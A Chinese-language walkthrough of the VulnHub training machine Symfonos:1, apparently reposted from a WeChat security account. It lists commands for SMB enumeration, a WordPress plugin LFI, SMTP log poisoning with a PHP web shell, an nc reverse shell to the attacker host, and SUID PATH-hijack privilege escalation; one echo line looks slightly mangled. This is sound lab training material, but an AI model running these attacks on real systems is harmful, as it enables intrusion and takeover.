虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/symfonos-1,322/
虚拟机简介:该机器是为准备OSCP而开发的,两个flag:user.txt和proof.txt
目标:1个flag
级别:初级
1、通过arp-scan检测主机IP地址
arp-scan -l
2、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.1.9
查看开放22、25、80、139、445端口
3、WEB渗透测试
3.1 查看服务器开启smb服务,先进行smb扫描探测
enum4linux 192.168.1.9
使用smbclient进行连接
smbclient -H //192.168.1.9/anonymous
查看文件得到三个密码,epidioko、qwerty、baseball
3.2 查看还有一个用户名的连接,使用qwerty密码连接成功
smbclient -H //192.168.1.9/helios -U helios
get research.txt
get todo.txt
查看提示有一个/h3l105
3.3 访问该页面后,查看到是一个WordPress站点
3.4 使用wpscan进行扫描,由于页面访问比较慢,需要添加hosts
vim /etc/hosts
使用wpscan进行扫描,查看到有两个漏洞的插件
wpscan --url http://symfonos.local/h3l105/ -eap
3.5 漏洞检索,发现两个插件都有漏洞,但是SQL注入漏洞需要用户名和密码,LFI不需要用户名密码
searchsploit site editor 1.1.1
searchsploit mail masta 1.0
3.6 测试使用LFI读取/etc/passwd
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
3.7 使用SMTP日志投毒配合LFI来进行RCE
参考:https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
telnet 192.168.1.9 25
MAIL FROM: <test>
RCPT TO: Helios
data
<?php system($_GET['a']);?>
.
quit
3.8 测试访问 helios 邮件
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=ip%20a
3.9 Kali开启NC反弹,并执行shell反弹
nc -nlvp 4444
执行反弹shell连接,并获取到反弹shell
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc -nv 192.168.1.129 4444 -e /bin/bash
4、系统提权
4.1 使用python优化脚本,无sudo权限,查找suid二进制文件
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
find / -perm -u=s 2>/dev/null
4.2 查看/opt/statuscheck用途,运行程序后执行http请求
type /opt/statuscheck
ls -l /opt
/opt/statuscheck
4.3 使用string查看二进制包含的字符串,执行curl命令
strings /opt/statuscheck
4.4 使用path变量提权
cd /tmp
echo $'#!/bin/shn/bin/sh' > curl
chmod +x curl
export PATH=$(pwd):$PATH
/opt/statuscheck
whoami
4.5 查看flag信息
ls /root
cat /root/proof.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Symfonos:1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论